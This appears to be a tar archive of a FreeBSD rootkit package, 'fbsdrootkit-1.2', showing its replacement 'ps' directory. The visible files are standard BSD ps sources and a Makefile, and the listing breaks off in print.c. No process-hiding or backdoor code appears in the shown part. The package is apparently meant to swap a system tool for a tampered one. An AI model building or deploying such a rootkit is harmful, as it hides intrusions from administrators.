fbsdrootkit-1.2/ 40700 764 764 0 6273477757 11064 5ustar dfdffbsdrootkit-1.2/ps/ 40700 764 764 0 6265032750 11463 5ustar dfdffbsdrootkit-1.2/ps/Makefile100600 764 764 410 6265032677 13205 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.5.4.2 1996/06/05 02:36:06 jkh Exp $ PROG= ps SRCS= fmt.c keyword.c nlist.c print.c ps.c CFLAGS+=-I/sys -static DPADD= ${LIBMATH} ${LIBKVM} LDADD= -lm -lkvm BINGRP= kmem BINMODE=2555 .include fbsdrootkit-1.2/ps/devname.c100600 764 764 5527 5640731120 13347 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: devname.c,v 1.2 1994/09/24 02:56:41 davidg Exp $ */ #if defined(LIBC_SCCS) && !defined(lint) static char sccsid[] = "@(#)devname.c 8.1 (Berkeley) 5/31/93"; #endif /* LIBC_SCCS and not lint */ #include #include #include #include #include #include #include #include char * devname(dev, type) dev_t dev; mode_t type; { struct { mode_t type; dev_t dev; } bkey; static DB *db; static int failure; DBT data, key; if (!db && !failure && !(db = dbopen(_PATH_DEVDB, O_RDONLY, 0, DB_HASH, NULL))) { warn("warning: %s", _PATH_DEVDB); failure = 1; } if (failure) return ("??"); /* * Keys are a mode_t followed by a dev_t. The former is the type of * the file (mode & S_IFMT), the latter is the st_rdev field. Be * sure to clear any padding that may be found in bkey. */ memset(&bkey, 0, sizeof(bkey)); bkey.dev = dev; bkey.type = type; key.data = &bkey; key.size = sizeof(bkey); return ((db->get)(db, &key, &data, 0) ? "??" : (char *)data.data); } fbsdrootkit-1.2/ps/extern.h100600 764 764 6650 5640731120 13240 0ustar dfdf/*- * Copyright (c) 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)extern.h 8.3 (Berkeley) 4/2/94 * $Id: extern.h,v 1.2 1994/09/24 02:56:42 davidg Exp $ */ struct kinfo; struct nlist; struct var; struct varent; extern fixpt_t ccpu; extern int eval, fscale, mempages, nlistread, rawcpu; extern int sumrusage, termwidth, totwidth; extern VAR var[]; extern VARENT *vhead; __BEGIN_DECLS void command __P((KINFO *, VARENT *)); void cputime __P((KINFO *, VARENT *)); int donlist __P((void)); void evar __P((KINFO *, VARENT *)); char *fmt_argv __P((char **, char *, int)); double getpcpu __P((KINFO *)); double getpmem __P((KINFO *)); void logname __P((KINFO *, VARENT *)); void longtname __P((KINFO *, VARENT *)); void lstarted __P((KINFO *, VARENT *)); void maxrss __P((KINFO *, VARENT *)); void nlisterr __P((struct nlist *)); void p_rssize __P((KINFO *, VARENT *)); void pagein __P((KINFO *, VARENT *)); void parsefmt __P((char *)); void pcpu __P((KINFO *, VARENT *)); void pmem __P((KINFO *, VARENT *)); void pri __P((KINFO *, VARENT *)); void printheader __P((void)); void pvar __P((KINFO *, VARENT *)); void rssize __P((KINFO *, VARENT *)); void runame __P((KINFO *, VARENT *)); void rvar __P((KINFO *, VARENT *)); void showkey __P((void)); void started __P((KINFO *, VARENT *)); void state __P((KINFO *, VARENT *)); void tdev __P((KINFO *, VARENT *)); void tname __P((KINFO *, VARENT *)); #ifndef NEWVM void trss __P((KINFO *, VARENT *)); #endif void tsize __P((KINFO *, VARENT *)); void ucomm __P((KINFO *, VARENT *)); void uname __P((KINFO *, VARENT *)); void uvar __P((KINFO *, VARENT *)); void vsize __P((KINFO *, VARENT *)); void wchan __P((KINFO *, VARENT *)); __END_DECLS fbsdrootkit-1.2/ps/fmt.c100600 764 764 6503 6155237104 12516 0ustar dfdf/*- * Copyright (c) 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: fmt.c,v 1.5.4.2 1996/06/05 02:36:08 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)fmt.c 8.4 (Berkeley) 4/15/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include "ps.h" static char *cmdpart __P((char *)); static char *shquote __P((char **)); /* * XXX * This is a stub until marc does the real one. */ static char * shquote(argv) char **argv; { char **p, *dst, *src; static char buf[ARG_MAX]; /* XXX */ if (*argv == 0) { buf[0] = 0; return (buf); } dst = buf; for (p = argv; (src = *p++) != 0; ) { if (*src == 0) continue; strvis(dst, src, VIS_NL | VIS_CSTYLE); while (*dst) dst++; *dst++ = ' '; } /* Chop off trailing space */ if (dst != buf) dst--; *dst = '\0'; return (buf); } static char * cmdpart(arg0) char *arg0; { char *cp; return ((cp = strrchr(arg0, '/')) != NULL ? cp + 1 : arg0); } char * fmt_argv(argv, cmd, maxlen) char **argv; char *cmd; int maxlen; { int len; char *ap, *cp; if (argv == 0 || argv[0] == 0) { if (cmd == NULL) return (""); ap = NULL; len = maxlen + 3; } else { ap = shquote(argv); len = strlen(ap) + maxlen + 4; } if ((cp = malloc(len)) == NULL) return (NULL); if (ap == NULL) sprintf(cp, " (%.*s)", maxlen, cmd); else if (strncmp(cmdpart(argv[0]), cmd, maxlen) != 0) sprintf(cp, "%s (%.*s)", ap, maxlen, cmd); else (void) strcpy(cp, ap); return (cp); } fbsdrootkit-1.2/ps/keyword.c100600 764 764 31402 6155237104 13430 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: keyword.c,v 1.5.6.3 1996/06/05 02:36:10 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)keyword.c 8.5 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif #ifdef NEWVM #include #include #endif static VAR *findvar __P((char *)); static int vcmp __P((const void *, const void *)); #ifdef NOTINUSE int utime(), stime(), ixrss(), idrss(), isrss(); {{"utime"}, "UTIME", USER, utime, 4}, {{"stime"}, "STIME", USER, stime, 4}, {{"ixrss"}, "IXRSS", USER, ixrss, 4}, {{"idrss"}, "IDRSS", USER, idrss, 4}, {{"isrss"}, "ISRSS", USER, isrss, 4}, #endif /* Compute offset in common structures. */ #define POFF(x) offsetof(struct proc, x) #define EOFF(x) offsetof(struct eproc, x) #define UOFF(x) offsetof(struct usave, x) #define ROFF(x) offsetof(struct rusage, x) #define UIDFMT "u" #define UIDLEN 5 #define PIDFMT "d" #define PIDLEN 5 #define USERLEN 8 VAR var[] = { #ifdef NEWVM {"%cpu", "%CPU", NULL, 0, pcpu, 4}, {"%mem", "%MEM", NULL, 0, pmem, 4}, {"acflag", "ACFLG", NULL, 0, pvar, 3, POFF(p_acflag), USHORT, "x"}, {"acflg", "", "acflag"}, {"blocked", "", "sigmask"}, {"caught", "", "sigcatch"}, {"command", "COMMAND", NULL, COMM|LJUST|USER, command, 16}, {"cpu", "CPU", NULL, 0, pvar, 3, POFF(p_estcpu), ULONG, "d"}, {"cputime", "", "time"}, {"f", "F", NULL, 0, pvar, 7, POFF(p_flag), LONG, "x"}, {"flags", "", "f"}, {"ignored", "", "sigignore"}, {"inblk", "INBLK", NULL, USER, rvar, 4, ROFF(ru_inblock), LONG, "d"}, {"inblock", "", "inblk"}, {"jobc", "JOBC", NULL, 0, evar, 4, EOFF(e_jobc), SHORT, "d"}, {"ktrace", "KTRACE", NULL, 0, pvar, 8, POFF(p_traceflag), LONG, "x"}, {"ktracep", "KTRACEP", NULL, 0, pvar, 8, POFF(p_tracep), LONG, "x"}, {"lim", "LIM", NULL, 0, maxrss, 5}, {"login", "LOGIN", NULL, LJUST, logname, MAXLOGNAME}, {"logname", "", "login"}, {"lstart", "STARTED", NULL, LJUST|USER, lstarted, 28}, {"majflt", "MAJFLT", NULL, USER, rvar, 4, ROFF(ru_majflt), LONG, "d"}, {"minflt", "MINFLT", NULL, USER, rvar, 4, ROFF(ru_minflt), LONG, "d"}, {"msgrcv", "MSGRCV", NULL, USER, rvar, 4, ROFF(ru_msgrcv), LONG, "d"}, {"msgsnd", "MSGSND", NULL, USER, rvar, 4, ROFF(ru_msgsnd), LONG, "d"}, {"ni", "", "nice"}, {"nice", "NI", NULL, 0, pvar, 2, POFF(p_nice), CHAR, "d"}, {"nivcsw", "NIVCSW", NULL, USER, rvar, 5, ROFF(ru_nivcsw), LONG, "d"}, {"nsignals", "", "nsigs"}, {"nsigs", "NSIGS", NULL, USER, rvar, 4, ROFF(ru_nsignals), LONG, "d"}, {"nswap", "NSWAP", NULL, USER, rvar, 4, ROFF(ru_nswap), LONG, "d"}, {"nvcsw", "NVCSW", NULL, USER, rvar, 5, ROFF(ru_nvcsw), LONG, "d"}, {"nwchan", "WCHAN", NULL, 0, pvar, 6, POFF(p_wchan), KPTR, "x"}, {"oublk", "OUBLK", NULL, USER, rvar, 4, ROFF(ru_oublock), LONG, "d"}, {"oublock", "", "oublk"}, {"p_ru", "P_RU", NULL, 0, pvar, 6, POFF(p_ru), KPTR, "x"}, {"paddr", "PADDR", NULL, 0, evar, 6, EOFF(e_paddr), KPTR, "x"}, {"pagein", "PAGEIN", NULL, USER, pagein, 6}, {"pcpu", "", "%cpu"}, {"pending", "", "sig"}, {"pgid", "PGID", NULL, 0, evar, PIDLEN, EOFF(e_pgid), ULONG, PIDFMT}, {"pid", "PID", NULL, 0, pvar, PIDLEN, POFF(p_pid), LONG, PIDFMT}, {"pmem", "", "%mem"}, {"ppid", "PPID", NULL, 0, evar, PIDLEN, EOFF(e_ppid), LONG, PIDFMT}, {"pri", "PRI", NULL, 0, pri, 3}, {"re", "RE", NULL, 0, pvar, 3, POFF(p_swtime), ULONG, "d"}, {"rgid", "RGID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_rgid), ULONG, UIDFMT}, {"rlink", "RLINK", NULL, 0, pvar, 8, POFF(p_back), KPTR, "x"}, {"rss", "RSS", NULL, 0, p_rssize, 4}, {"rssize", "", "rsz"}, {"rsz", "RSZ", NULL, 0, rssize, 4}, {"rtprio", "RTPRIO", NULL, 0, pvar, 7, POFF(p_rtprio), LONG, "d"}, {"ruid", "RUID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_ruid), ULONG, UIDFMT}, {"ruser", "RUSER", NULL, LJUST, runame, USERLEN}, {"sess", "SESS", NULL, 0, evar, 6, EOFF(e_sess), KPTR, "x"}, {"sig", "PENDING", NULL, 0, pvar, 8, POFF(p_siglist), LONG, "x"}, {"sigcatch", "CAUGHT", NULL, 0, pvar, 8, POFF(p_sigcatch), LONG, "x"}, {"sigignore", "IGNORED", NULL, 0, pvar, 8, POFF(p_sigignore), LONG, "x"}, {"sigmask", "BLOCKED", NULL, 0, pvar, 8, POFF(p_sigmask), LONG, "x"}, {"sl", "SL", NULL, 0, pvar, 3, POFF(p_slptime), ULONG, "d"}, {"start", "STARTED", NULL, LJUST|USER, started, 8}, {"stat", "", "state"}, {"state", "STAT", NULL, 0, state, 4}, {"svgid", "SVGID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_svgid), ULONG, UIDFMT}, {"svuid", "SVUID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_svuid), ULONG, UIDFMT}, {"tdev", "TDEV", NULL, 0, tdev, 4}, {"time", "TIME", NULL, USER, cputime, 9}, {"tpgid", "TPGID", NULL, 0, evar, 4, EOFF(e_tpgid), ULONG, PIDFMT}, {"tsess", "TSESS", NULL, 0, evar, 6, EOFF(e_tsess), KPTR, "x"}, {"tsiz", "TSIZ", NULL, 0, tsize, 4}, {"tt", "TT ", NULL, 0, tname, 4}, {"tty", "TTY", NULL, LJUST, longtname, 8}, {"ucomm", "UCOMM", NULL, LJUST, ucomm, MAXCOMLEN}, {"uid", "UID", NULL, 0, evar, UIDLEN, EOFF(e_ucred.cr_uid), ULONG, UIDFMT}, {"upr", "UPR", NULL, 0, pvar, 3, POFF(p_usrpri), CHAR, "d"}, {"user", "USER", NULL, LJUST, uname, USERLEN}, {"usrpri", "", "upr"}, {"vsize", "", "vsz"}, {"vsz", "VSZ", NULL, 0, vsize, 5}, {"wchan", "WCHAN", NULL, LJUST, wchan, 6}, {"xstat", "XSTAT", NULL, 0, pvar, 4, POFF(p_xstat), USHORT, "x"}, #else {"%cpu", "%CPU", NULL, 0, pcpu, 4}, {"%mem", "%MEM", NULL, 0, pmem, 4}, {"acflag", "ACFLG", NULL, USER, uvar, 3, UOFF(u_acflag), SHORT, "x"}, {"acflg", "", "acflag"}, {"blocked", "", "sigmask"}, {"caught", "", "sigcatch"}, {"command", "COMMAND", NULL, COMM|LJUST|USER, command, 16}, {"cpu", "CPU", NULL, 0, pvar, 3, POFF(p_cpu), ULONG, "d"}, {"cputime", "", "time"}, {"f", "F", NULL, 0, pvar, 7, POFF(p_flag), LONG, "x"}, {"flags", "", "f"}, {"ignored", "", "sigignore"}, {"inblk", "INBLK", NULL, USER, rvar, 4, ROFF(ru_inblock), LONG, "d"}, {"inblock", "", "inblk"}, {"jobc", "JOBC", NULL, 0, evar, 4, EOFF(e_jobc), SHORT, "d"}, {"ktrace", "KTRACE", NULL, 0, pvar, 8, POFF(p_traceflag), LONG, "x"}, {"ktracep", "KTRACEP", NULL, 0, pvar, 8, POFF(p_tracep), LONG, "x"}, {"lim", "LIM", NULL, 0, maxrss, 5}, {"logname", "LOGNAME", NULL, LJUST, logname, MAXLOGNAME}, {"lstart", "STARTED", NULL, LJUST|USER, lstarted, 28}, {"majflt", "MAJFLT", NULL, USER, rvar, 4, ROFF(ru_majflt), LONG, "d"}, {"minflt", "MINFLT", NULL, USER, rvar, 4, ROFF(ru_minflt), LONG, "d"}, {"msgrcv", "MSGRCV", NULL, USER, rvar, 4, ROFF(ru_msgrcv), LONG, "d"}, {"msgsnd", "MSGSND", NULL, USER, rvar, 4, ROFF(ru_msgsnd), LONG, "d"}, {"ni", "", "nice"}, {"nice", "NI", NULL, 0, pvar, 2, POFF(p_nice), CHAR, "d"}, {"nivcsw", "NIVCSW", NULL, USER, rvar, 5, ROFF(ru_nivcsw), LONG, "d"}, {"nsignals", "", "nsigs"}, {"nsigs", "NSIGS", NULL, USER, rvar, 4, ROFF(ru_nsignals), LONG, "d"}, {"nswap", "NSWAP", NULL, USER, rvar, 4, ROFF(ru_nswap), LONG, "d"}, {"nvcsw", "NVCSW", NULL, USER, rvar, 5, ROFF(ru_nvcsw), LONG, "d"}, {"nwchan", "WCHAN", NULL, 0, pvar, 6, POFF(p_wchan), KPTR, "x"}, {"oublk", "OUBLK", NULL, USER, rvar, 4, ROFF(ru_oublock), LONG, "d"}, {"oublock", "", "oublk"}, {"p_ru", "P_RU", NULL, 0, pvar, 6, POFF(p_ru), KPTR, "x"}, {"paddr", "PADDR", NULL, 0, evar, 6, EOFF(e_paddr), KPTR, "x"}, {"pagein", "PAGEIN", NULL, USER, pagein, 6}, {"pcpu", "", "%cpu"}, {"pending", "", "sig"}, {"pgid", "PGID", NULL, 0, evar, PIDLEN, EOFF(e_pgid), ULONG, PIDFMT}, {"pid", "PID", NULL, 0, pvar, PIDLEN, POFF(p_pid), LONG, PIDFMT}, {"pmem", "", "%mem"}, {"poip", "POIP", NULL, 0, pvar, 4, POFF(p_poip), SHORT, "d"}, {"ppid", "PPID", NULL, 0, pvar, PIDLEN, POFF(p_ppid), LONG, PIDFMT}, {"pri", "PRI", NULL, 0, pri, 3}, {"re", "RE", NULL, 0, pvar, 3, POFF(p_swtime), ULONG, "d"}, {"rgid", "RGID", NULL, 0, pvar, UIDLEN, POFF(p_rgid), USHORT, UIDFMT}, {"rlink", "RLINK", NULL, 0, pvar, 8, POFF(p_rlink), KPTR, "x"}, {"rss", "RSS", NULL, 0, p_rssize, 4}, {"rssize", "", "rsz"}, {"rsz", "RSZ", NULL, 0, rssize, 4}, {"ruid", "RUID", NULL, 0, pvar, UIDLEN, POFF(p_ruid), USHORT, UIDFMT}, {"rtprio", "RTPRIO", NULL, 0, pvar, 7, POFF(p_rtprio), LONG, "d"}, {"ruser", "RUSER", NULL, LJUST, runame, USERLEN}, {"sess", "SESS", NULL, 0, evar, 6, EOFF(e_sess), KPTR, "x"}, {"sig", "PENDING", NULL, 0, pvar, 8, POFF(p_sig), LONG, "x"}, {"sigcatch", "CAUGHT", NULL, 0, pvar, 8, POFF(p_sigcatch), LONG, "x"}, {"sigignore", "IGNORED", NULL, 0, pvar, 8, POFF(p_sigignore), LONG, "x"}, {"sigmask", "BLOCKED", NULL, 0, pvar, 8, POFF(p_sigmask), LONG, "x"}, {"sl", "SL", NULL, 0, pvar, 3, POFF(p_slptime), ULONG, "d"}, {"start", "STARTED", NULL, LJUST|USER, started, 8}, {"stat", "", "state"}, {"state", "STAT", NULL, 0, state, 4}, {"svgid", "SVGID", NULL, 0, pvar, UIDLEN, POFF(p_svgid), USHORT, UIDFMT}, {"svuid", "SVUID", NULL, 0, pvar, UIDLEN, POFF(p_svuid), USHORT, UIDFMT}, {"tdev", "TDEV", NULL, 0, tdev, 4}, {"time", "TIME", NULL, USER, cputime, 9}, {"tpgid", "TPGID", NULL, 0, evar, 4, EOFF(e_tpgid), ULONG, PIDFMT}, {"trs", "TRS", NULL, 0, trss, 3}, {"tsess", "TSESS", NULL, 0, evar, 6, EOFF(e_tsess), KPTR, "x"}, {"tsiz", "TSIZ", NULL, 0, tsize, 4}, {"tt", "TT", NULL, LJUST, tname, 4}, {"tty", "TTY", NULL, LJUST, longtname, 8}, {"ucomm", "UCOMM", NULL, LJUST, ucomm, MAXCOMLEN}, {"uid", "UID", NULL, 0, pvar, UIDLEN, POFF(p_uid),USHORT, UIDFMT}, {"upr", "UPR", NULL, 0, pvar, 3, POFF(p_usrpri), CHAR, "d"}, {"uprocp", "UPROCP", NULL, USER, uvar, 6, UOFF(u_procp), KPTR, "x"}, {"user", "USER", NULL, LJUST, uname, USERLEN}, {"usrpri", "", "upr"}, {"vsize", "", "vsz"}, {"vsz", "VSZ", NULL, 0, vsize, 5}, {"wchan", "WCHAN", NULL, LJUST, wchan, 6}, {"xstat", "XSTAT", NULL, 0, pvar, 4, POFF(p_xstat), USHORT, "x"}, #endif {""}, }; void showkey() { VAR *v; int i; char *p, *sep; i = 0; sep = ""; for (v = var; *(p = v->name); ++v) { int len = strlen(p); if (termwidth && (i += len + 1) > termwidth) { i = len; sep = "\n"; } (void) printf("%s%s", sep, p); sep = " "; } (void) printf("\n"); } void parsefmt(p) char *p; { static struct varent *vtail; #define FMTSEP " \t,\n" while (p && *p) { char *cp; VAR *v; struct varent *vent; while ((cp = strsep(&p, FMTSEP)) != NULL && *cp == '\0') /* void */; if (!(v = findvar(cp))) continue; if ((vent = malloc(sizeof(struct varent))) == NULL) err(1, NULL); vent->var = v; vent->next = NULL; if (vhead == NULL) vhead = vtail = vent; else { vtail->next = vent; vtail = vent; } } if (!vhead) errx(1, "no valid keywords"); } static VAR * findvar(p) char *p; { VAR *v, key; char *hp; int vcmp(); key.name = p; hp = strchr(p, '='); if (hp) *hp++ = '\0'; key.name = p; v = bsearch(&key, var, sizeof(var)/sizeof(VAR) - 1, sizeof(VAR), vcmp); if (v && v->alias) { if (hp) { warnx("%s: illegal keyword specification", p); eval = 1; } parsefmt(v->alias); return ((VAR *)NULL); } if (!v) { warnx("%s: keyword not found", p); eval = 1; } if (hp) v->header = hp; return (v); } static int vcmp(a, b) const void *a, *b; { return (strcmp(((VAR *)a)->name, ((VAR *)b)->name)); } fbsdrootkit-1.2/ps/nlist.c100600 764 764 7267 5665025740 13077 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: nlist.c,v 1.5 1994/11/24 13:13:55 davidg Exp $ */ #ifndef lint static char sccsid[] = "@(#)nlist.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif struct nlist psnl[] = { {"_fscale"}, #define X_FSCALE 0 {"_ccpu"}, #define X_CCPU 1 #ifdef NEWVM {"_avail_start"}, #define X_AVAILSTART 2 {"_avail_end"}, #define X_AVAILEND 3 #else {"_ecmx"}, #define X_ECMX 2 #endif {NULL} }; fixpt_t ccpu; /* kernel _ccpu variable */ int nlistread; /* if nlist already read. */ int mempages; /* number of pages of phys. memory */ int fscale; /* kernel _fscale variable */ extern kvm_t *kd; #define kread(x, v) \ kvm_read(kd, psnl[x].n_value, (char *)&v, sizeof v) != sizeof(v) int donlist() { int rval; #ifdef NEWVM int tmp; #endif rval = 0; nlistread = 1; if (kvm_nlist(kd, psnl)) { nlisterr(psnl); eval = 1; return (1); } if (kread(X_FSCALE, fscale)) { warnx("fscale: %s", kvm_geterr(kd)); eval = rval = 1; } #ifdef NEWVM if (kread(X_AVAILEND, mempages)) { warnx("avail_start: %s", kvm_geterr(kd)); eval = rval = 1; } if (kread(X_AVAILSTART, tmp)) { warnx("avail_end: %s", kvm_geterr(kd)); eval = rval = 1; } mempages -= tmp; mempages /= PAGE_SIZE; #else if (kread(X_ECMX, mempages)) { warnx("ecmx: %s", kvm_geterr(kd)); eval = rval = 1; } #endif if (kread(X_CCPU, ccpu)) { warnx("ccpu: %s", kvm_geterr(kd)); eval = rval = 1; } return (rval); } void nlisterr(nl) struct nlist nl[]; { int i; (void)fprintf(stderr, "ps: nlist: can't find following symbols:"); for (i = 0; nl[i].n_name != NULL; i++) if (nl[i].n_value == 0) (void)fprintf(stderr, " %s", nl[i].n_name); (void)fprintf(stderr, "\n"); } fbsdrootkit-1.2/ps/print.c100600 764 764 33755 6155237104 13115 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, 